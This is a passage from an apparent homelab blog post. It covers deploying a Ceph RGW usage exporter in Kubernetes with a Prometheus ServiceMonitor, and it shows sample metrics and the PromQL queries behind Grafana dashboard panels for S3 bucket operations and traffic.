</span></span><span style="display:flex;"><span>              <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-buckets-usage-exporter</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">SECRET_KEY</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">key</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-buckets-usage-exporter</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">RADOSGW_SERVER</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">key</span>: <span style="color:#ae81ff">Endpoint</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-buckets-usage-exporter</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">VIRTUAL_PORT</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;9242&#34;</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">STORE</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">value</span>: <span style="color:#ae81ff">rgw-bulk</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">LOG_LEVEL</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">value</span>: <span style="color:#ae81ff">INFO</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">TIMEOUT</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;60&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>        - --<span style="color:#ae81ff">insecure</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">exporter</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">containerPort</span>: <span style="color:#ae81ff">9242</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">http</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">40Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">10m</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">40Mi</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">livenessProbe</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">tcpSocket</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">port</span>: <span style="color:#ae81ff">http</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">readinessProbe</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">tcpSocket</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">port</span>: <span style="color:#ae81ff">http</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">allowPrivilegeEscalation</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">capabilities</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">drop</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#ae81ff">ALL</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">readOnlyRootFilesystem</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">runAsNonRoot</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">runAsUser</span>: <span style="color:#ae81ff">1000</span>
</span></span></code></pre></div><p>Next, the Service for the exporter:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rgw-exporter</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">app.kubernetes.io/name</span>: <span style="color:#ae81ff">rgw-exporter</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">app.kubernetes.io/name</span>: <span style="color:#ae81ff">rgw-exporter</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">http</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">port</span>: <span style="color:#ae81ff">9242</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">9242</span>
</span></span></code></pre></div><p>And last but certainly not least, the <a href="https://prometheus-operator.dev/docs/api-reference/api/#monitoring.coreos.com/v1.ServiceMonitor">ServiceMonitor</a>,
which tells the Prometheus Operator to scrape the exporter:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">monitoring.coreos.com/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ServiceMonitor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rgw-exporter</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">app.kubernetes.io/name</span>: <span style="color:#ae81ff">rgw-exporter</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app.kubernetes.io/name</span>: <span style="color:#ae81ff">rgw-exporter</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpoints</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">honorLabels</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">interval</span>: <span style="color:#ae81ff">90s</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/metrics</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">port</span>: <span style="color:#ae81ff">http</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">http</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">scrapeTimeout</span>: <span style="color:#ae81ff">60s</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metricRelabelings</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regex</span>: <span style="color:#e6db74">&#39;python_gc_.*&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sourceLabels</span>: [<span style="color:#ae81ff">__name__]</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regex</span>: <span style="color:#e6db74">&#39;process_.*&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sourceLabels</span>: [<span style="color:#ae81ff">__name__]</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regex</span>: <span style="color:#e6db74">&#39;radosgw_usage_bucket_quota_.*&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sourceLabels</span>: [<span style="color:#ae81ff">__name__]</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regex</span>: <span style="color:#e6db74">&#39;radosgw_usage_user_quota_.*&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sourceLabels</span>: [<span style="color:#ae81ff">__name__]</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regex</span>: <span style="color:#e6db74">&#39;radosgw_usage_user_bucket_quota_.*&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sourceLabels</span>: [<span style="color:#ae81ff">__name__]</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regex</span>: <span style="color:#e6db74">&#39;(get_bucket_encryption|get_bucket_object_lock|get_bucket_policy|get_bucket_tags|get_cors|get_lifecycle|get_acls|get_bucket_location|get_bucket_policy|get_bucket_public_access_block|get_bucket_versioning|get_request_payment|put_acls|put_bucket_policy|stat_bucket|delete_bucket_policy|get_bucket_replication)&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sourceLabels</span>: [<span style="color:#ae81ff">category]</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">jobLabel</span>: <span style="color:#ae81ff">rgw-exporter</span>
</span></span></code></pre></div><p>This is the only part of the example where I made major changes. First, there are
as always a few metrics from the exporter itself, which I&rsquo;m never interested in.
Then, I&rsquo;m also dropping some quota-related data, because I don&rsquo;t use quotas at
all. And finally, the exporter provides data on many types of S3 operations per
user/bucket, which leads to quite a lot of data. But I&rsquo;m not interested in the
data for low-frequency operations like <code>put_acls</code> for example. So I drop
those as well.</p>
<p>I deployed all of this into my Rook cluster namespace (not the Rook operator namespace!).</p>
<p>Before going to the dashboards, here&rsquo;s a small overview of the data provided by
the exporter:</p>
<pre tabindex="0"><code># HELP radosgw_usage_ops_total Number of operations
# TYPE radosgw_usage_ops_total counter
radosgw_usage_ops_total{bucket=&#34;-&#34;,category=&#34;get_bucket_encryption&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 2.0
radosgw_usage_ops_total{bucket=&#34;-&#34;,category=&#34;get_bucket_object_lock&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 2.0
radosgw_usage_ops_total{bucket=&#34;-&#34;,category=&#34;get_bucket_policy&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 1.0
radosgw_usage_ops_total{bucket=&#34;-&#34;,category=&#34;get_bucket_tags&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 2.0
radosgw_usage_ops_total{bucket=&#34;-&#34;,category=&#34;get_obj&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 52742.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;create_bucket&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 1.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;get_bucket_policy&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 3.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;get_bucket_public_access_block&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 2.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;get_bucket_versioning&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 2.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;get_obj&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 1.78032e+06
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;get_request_payment&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 2.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;list_bucket&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 164.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;post_obj&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 123.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;put_bucket_policy&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 2.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;put_obj&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 7572.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;stat_bucket&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 2.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;multi_object_delete&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 4.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;copy_obj&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 14.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;get_acls&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 14.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;put_acls&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 14.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;get_obj_layout&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 2.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;options_cors&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 4.0
# HELP radosgw_usage_successful_ops_total Number of successful operations
# TYPE radosgw_usage_successful_ops_total counter
radosgw_usage_successful_ops_total{bucket=&#34;blog&#34;,category=&#34;get_obj&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 1.780191e+06
# HELP radosgw_usage_sent_bytes_total Bytes sent by the RADOSGW
# TYPE radosgw_usage_sent_bytes_total counter
radosgw_usage_sent_bytes_total{bucket=&#34;blog&#34;,category=&#34;get_obj&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 7.7364643823e+010
# HELP radosgw_usage_received_bytes_total Bytes received by the RADOSGW
# TYPE radosgw_usage_received_bytes_total counter
radosgw_usage_received_bytes_total{bucket=&#34;blog&#34;,category=&#34;get_obj&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 0.0
# HELP radosgw_usage_bucket_utilized_bytes Bucket utilized bytes
# TYPE radosgw_usage_bucket_utilized_bytes gauge
radosgw_usage_bucket_utilized_bytes{bucket=&#34;blog&#34;,category=&#34;a2367ad5-81df-4ab3-8b6b-cae4bd659f64&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 1.03238176e+08
# HELP radosgw_usage_bucket_objects Number of objects in bucket
# TYPE radosgw_usage_bucket_objects gauge
radosgw_usage_bucket_objects{bucket=&#34;blog&#34;,category=&#34;a2367ad5-81df-4ab3-8b6b-cae4bd659f64&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 934.0
# HELP radosgw_usage_bucket_quota_enabled Quota enabled for bucket
# TYPE radosgw_usage_bucket_quota_enabled gauge
radosgw_usage_bucket_quota_enabled{bucket=&#34;blog&#34;,category=&#34;a2367ad5-81df-4ab3-8b6b-cae4bd659f64&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 0.0
# HELP radosgw_usage_bucket_quota_size Maximum allowed bucket size
# TYPE radosgw_usage_bucket_quota_size gauge
radosgw_usage_bucket_quota_size{bucket=&#34;blog&#34;,category=&#34;a2367ad5-81df-4ab3-8b6b-cae4bd659f64&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} -1.0
# HELP radosgw_usage_bucket_quota_size_bytes Maximum allowed bucket size in bytes
# TYPE radosgw_usage_bucket_quota_size_bytes gauge
radosgw_usage_bucket_quota_size_bytes{bucket=&#34;blog&#34;,category=&#34;a2367ad5-81df-4ab3-8b6b-cae4bd659f64&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 0.0
# HELP radosgw_usage_bucket_quota_size_objects Maximum allowed bucket size in number of objects
# TYPE radosgw_usage_bucket_quota_size_objects gauge
radosgw_usage_bucket_quota_size_objects{bucket=&#34;blog&#34;,category=&#34;a2367ad5-81df-4ab3-8b6b-cae4bd659f64&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} -1.0
# HELP radosgw_usage_bucket_shards Number ob shards in bucket
# TYPE radosgw_usage_bucket_shards gauge
radosgw_usage_bucket_shards{bucket=&#34;blog&#34;,category=&#34;a2367ad5-81df-4ab3-8b6b-cae4bd659f64&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 11.0
# HELP radosgw_user_metadata User metadata
# TYPE radosgw_user_metadata gauge
radosgw_user_metadata{display_name=&#34;User for the blog&#34;,email=&#34;&#34;,storage_class=&#34;&#34;,store=&#34;rgw-bulk&#34;,user=&#34;blog&#34;} 1.0
# HELP radosgw_usage_user_quota_enabled User quota enabled
# TYPE radosgw_usage_user_quota_enabled gauge
radosgw_usage_user_quota_enabled{store=&#34;rgw-bulk&#34;,user=&#34;blog&#34;} 0.0
# HELP radosgw_usage_user_quota_size Maximum allowed size for user
# TYPE radosgw_usage_user_quota_size gauge
radosgw_usage_user_quota_size{store=&#34;rgw-bulk&#34;,user=&#34;blog&#34;} -1.0
# HELP radosgw_usage_user_quota_size_bytes Maximum allowed size in bytes for user
# TYPE radosgw_usage_user_quota_size_bytes gauge
radosgw_usage_user_quota_size_bytes{store=&#34;rgw-bulk&#34;,user=&#34;blog&#34;} 0.0
# HELP radosgw_usage_user_quota_size_objects Maximum allowed number of objects across all user buckets
# TYPE radosgw_usage_user_quota_size_objects gauge
radosgw_usage_user_quota_size_objects{store=&#34;rgw-bulk&#34;,user=&#34;blog&#34;} -1.0
# HELP radosgw_usage_user_bucket_quota_enabled User per-bucket-quota enabled
# TYPE radosgw_usage_user_bucket_quota_enabled gauge
radosgw_usage_user_bucket_quota_enabled{store=&#34;rgw-bulk&#34;,user=&#34;blog&#34;} 0.0
# HELP radosgw_usage_user_bucket_quota_size Maximum allowed size for each bucket of user
# TYPE radosgw_usage_user_bucket_quota_size gauge
radosgw_usage_user_bucket_quota_size{store=&#34;rgw-bulk&#34;,user=&#34;blog&#34;} -1.0
# HELP radosgw_usage_user_bucket_quota_size_bytes Maximum allowed size bytes size for each bucket of user
# TYPE radosgw_usage_user_bucket_quota_size_bytes gauge
radosgw_usage_user_bucket_quota_size_bytes{store=&#34;rgw-bulk&#34;,user=&#34;blog&#34;} 0.0
# HELP radosgw_usage_user_bucket_quota_size_objects Maximum allowed number of objects in each user bucket
# TYPE radosgw_usage_user_bucket_quota_size_objects gauge
radosgw_usage_user_bucket_quota_size_objects{store=&#34;rgw-bulk&#34;,user=&#34;blog&#34;} -1.0
# HELP radosgw_usage_user_total_objects Usage of objects by user
# TYPE radosgw_usage_user_total_objects gauge
radosgw_usage_user_total_objects{store=&#34;rgw-bulk&#34;,user=&#34;blog&#34;} 934.0
# HELP radosgw_usage_user_total_bytes Usage of bytes by user
# TYPE radosgw_usage_user_total_bytes gauge
radosgw_usage_user_total_bytes{store=&#34;rgw-bulk&#34;,user=&#34;blog&#34;} 1.0549248e+08
# HELP radosgw_usage_scrape_duration_seconds Ammount of time each scrape takes
# TYPE radosgw_usage_scrape_duration_seconds gauge
radosgw_usage_scrape_duration_seconds 2.390573501586914
</code></pre><p>I&rsquo;ve left only the data for my blog bucket in the scrape result. I do not know
what the <code>-</code> bucket in the ops related data represents, I&rsquo;m afraid.</p>
<h2 id="the-dashboard">The dashboard</h2>
<p>At the top of my dashboard, I&rsquo;ve got a few overall figures in Grafana stats
panels:
<figure>
    <img loading="lazy" src="stats-panels.png"
         alt="A screenshot of a number of Grafana panels. All of them are stats type panels. First is the number of users, currently thirty. Followed by the number of buckets at 27. The next panel shows the number of objects, currently 1.2 million, followed by the total number of operations in the interval, 306k in the example. Followed by the total bytes received and send in the interval, at 1.14 GB and 1.81 GB respectively."/> <figcaption>
            <p>The top of my dashboard, with a couple of overall figures on all S3 buckets.</p>
        </figcaption>
</figure>
</p>
<p>These are configured with the following PromQL queries:</p>
<ul>
<li><em>Number of Users:</em> <code>sum(count(radosgw_user_metadata) by (user))</code></li>
<li><em>Number of Buckets:</em> <code>sum(count(radosgw_usage_bucket_objects) by (bucket))</code></li>
<li><em>Number of Objects:</em> <code>sum(radosgw_usage_bucket_objects)</code></li>
<li><em>Total Ops in Interval:</em> <code>sum(increase(radosgw_usage_ops_total[$__range]))</code></li>
<li><em>Total bytes received in Interval:</em> <code>sum(increase(radosgw_usage_received_bytes_total[$__range]))</code></li>
<li><em>Total bytes send in Interval:</em> <code>sum(increase(radosgw_usage_sent_bytes_total[$__range]))</code></li>
</ul>
<p>Next up are two panels on the operations the RGW executed in the interval. These
are basically the S3 endpoints that got hit. I decided to go with two time series
panels, one showing operations accumulated by type over all buckets, and the
other showing operations per bucket, accumulated over all types of operation.</p>
<figure>
    <img loading="lazy" src="ops-panels.png"
         alt="A screenshot of two Grafana panels. Both show operations per second. The first graph shows operations by type. The only plots really visible in the graph are those for the &#39;get_obj&#39; and &#39;list_bucket&#39; operations. The plot for the &#39;get_obj&#39; operation is relatively steady, oscillating around 10 ops/s, with very regular spikes up to about 38 ops/s every 30 minutes. The &#39;list_bucket&#39; plot shows a different pattern, with spots where it falls to zero, then shows three &#39;humps&#39; of 2.2 ops/s one after the other and finishing with a bigger and longer hump up to 4.2 ops/s. Then the same pattern repeats. None of the other operation types are high enough to be visible in the graph. The other graph shows the same time range, but this time, the operations are grouped by bucket, instead of type. It is immediately clear that the 30 minute spikes up to 38 ops/s are produced by the &#39;-&#39; and &#39;thanos&#39; buckets. Three buckets are producing the highest load, with the &#39;thanos&#39; bucket producing around five ops/s, the &#39;-&#39; bucket around 3.5 ops/s and the cnpg-backup 1.5 ops/s."/> <figcaption>
            <p>Plots for operations, showing the ops/s by type and by bucket.</p>
        </figcaption>
</figure>

<p>The per-operation plot is created with this PromQL query:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#66d9ef">sum</span><span style="color:#f92672">(</span><span style="color:#66d9ef">rate</span><span style="color:#f92672">(</span>radosgw_usage_ops_total[<span style="color:#e6db74">5m</span>]<span style="color:#f92672">))</span> <span style="color:#66d9ef">by</span> <span style="color:#f92672">(</span>category<span style="color:#f92672">)</span>
</span></span></code></pre></div><p>And the per-bucket plot with this one:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#66d9ef">sum</span><span style="color:#f92672">(</span><span style="color:#66d9ef">rate</span><span style="color:#f92672">(</span>radosgw_usage_ops_total[<span style="color:#e6db74">5m</span>]<span style="color:#f92672">))</span> <span style="color:#66d9ef">by</span> <span style="color:#f92672">(</span>bucket<span style="color:#f92672">)</span>
</span></span></code></pre></div><p>These two plots nicely show which apps produce the highest S3 load in my Homelab.
The highest load, with about 5 ops/s on average, is coming from Thanos. Meaning
my metrics gathering is the highest S3 user by operations in my Homelab. Surprising
exactly nobody, I assume. &#x1f605;
Next comes this weird <code>-</code> bucket, which I still cannot explain. But it might have
something to do with Thanos as well, as it seems to follow a similar pattern as
the Thanos bucket requests?
The final consistent user is the CloudNativePG backup, which produces about
1.5 ops/s.</p>
<p>It really should make me feel a bit queasy that the largest user of my S3 is
my metrics gathering. Yet somehow, I don&rsquo;t care even a bit. &#x1f601;</p>
<p>Next are the transmission plots, with bytes send and received:
<figure>
    <img loading="lazy" src="bytes-overall.png"
         alt="Another screenshot of two Grafana time series plots. The first one shows bytes received, and the second one shows bytes send. Both show low average activity, with about 8 kB/s send and about 5 kB/s received.Both plots show a few relatively short peaks, with bytes send going up to about 1.75 MB/s and bytes received peaking at about 1 MB/s."/> <figcaption>
            <p>Plots for bytes send and received by the RGWs overall.</p>
        </figcaption>
</figure>

Overall, a pretty low average activity, with spikes going up no higher than
1.75 MB/s.</p>
<p>The plots are produced with these PromQL queries, starting with the &ldquo;Bytes send&rdquo;
plot:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#66d9ef">sum</span><span style="color:#f92672">(</span><span style="color:#66d9ef">rate</span><span style="color:#f92672">(</span>radosgw_usage_sent_bytes_total[<span style="color:#e6db74">5m</span>]<span style="color:#f92672">))</span>
</span></span></code></pre></div><p>And the &ldquo;Bytes received&rdquo; plot:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#66d9ef">sum</span><span style="color:#f92672">(</span><span style="color:#66d9ef">rate</span><span style="color:#f92672">(</span>radosgw_usage_received_bytes_total[<span style="color:#e6db74">5m</span>]<span style="color:#f92672">))</span>
</span></span></code></pre></div><p>Then I&rsquo;ve got the same plots, but now grouped by buckets receiving/sending the
bytes:
<figure>
    <img loading="lazy" src="bytes-by-bucket.png"
         alt="A screenshot of two Grafana time series plots. They show bytes send and received by bucket. Similar to the previous two plots, most of the time almost no traffic appears. But what these plots reveal is that most of the spikes in the previous bytes send plot came from the Thanos bucket. Similarly, the bytes received came from the Thanos bucket, but also the Harbor bucket. Similar to the previous plot, the spikes are still pretty low, around 1.75 MB/s for sending and 1 MB/s for receiving."/> <figcaption>
            <p>Plots for bytes send and received, this time accumulated by bucket.</p>
        </figcaption>
</figure>

These plots show a similar picture to the previous ones, but allow me to see which
bucket produced the most load. Things to note here is that while the spikes for
bytes send came from the Thanos bucket, the spikes from the bytes received plot
came from a mix of the Thanos bucket and the Harbor bucket. That&rsquo;s most likely
because I was working on some container images at the time the panels are showing.</p>
<p>Both of the above plots were produced similar to the previous combined plots,
just with an additional <code>by</code> clause:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#75715e"># Bytes send</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">sum</span><span style="color:#f92672">(</span><span style="color:#66d9ef">rate</span><span style="color:#f92672">(</span>radosgw_usage_sent_bytes_total[<span style="color:#e6db74">5m</span>]<span style="color:#f92672">))</span> <span style="color:#66d9ef">by</span> <span style="color:#f92672">(</span>bucket<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Bytes received</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">sum</span><span style="color:#f92672">(</span><span style="color:#66d9ef">rate</span><span style="color:#f92672">(</span>radosgw_usage_received_bytes_total[<span style="color:#e6db74">5m</span>]<span style="color:#f92672">))</span> <span style="color:#66d9ef">by</span> <span style="color:#f92672">(</span>bucket<span style="color:#f92672">)</span>
</span></span></code></pre></div><p>The next two plots are showing the size of the buckets over time, both in bytes
and in objects:
<figure>
    <img loading="lazy" src="size-panels.png"
